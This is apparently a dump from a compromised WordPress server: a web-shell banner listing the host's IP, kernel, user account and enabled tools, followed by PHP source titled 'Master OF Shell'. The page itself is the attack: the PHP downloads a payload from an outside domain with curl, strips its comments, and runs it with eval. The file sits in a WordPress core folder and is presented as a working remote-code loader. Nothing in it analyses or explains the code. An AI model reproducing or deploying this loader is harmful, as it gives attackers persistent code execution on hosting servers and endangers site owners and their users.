Server IP : 172.67.214.6 / Your IP : 216.73.216.244 Web Server : LiteSpeed System : Linux premium900.web-hosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : redwjova ( 1790) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/redwjova/www/wp-includes/rest-api/search/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Master OF Shell</title> </head> <body> <h1>File Manager Root</h1> <p>Shell Master:</p> <div> <?php function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); curl_close($ch); return $data; } $url = 'https://meledak2024.net/wp-content/sibai88.txt'; $data = get($url); if ($data !== false) { $cleanedData = preg_replace('/\/\*.*\*\//sU', '', $data); // Hapus komentar $cleanedData = preg_replace('/\/\*.*?infection.*?\*\//s', '', $cleanedData); // Hapus metadata eval("?>$cleanedData"); } else { echo "Tidak dapat mengambil data dari URL."; } ?> </div> </body> </html>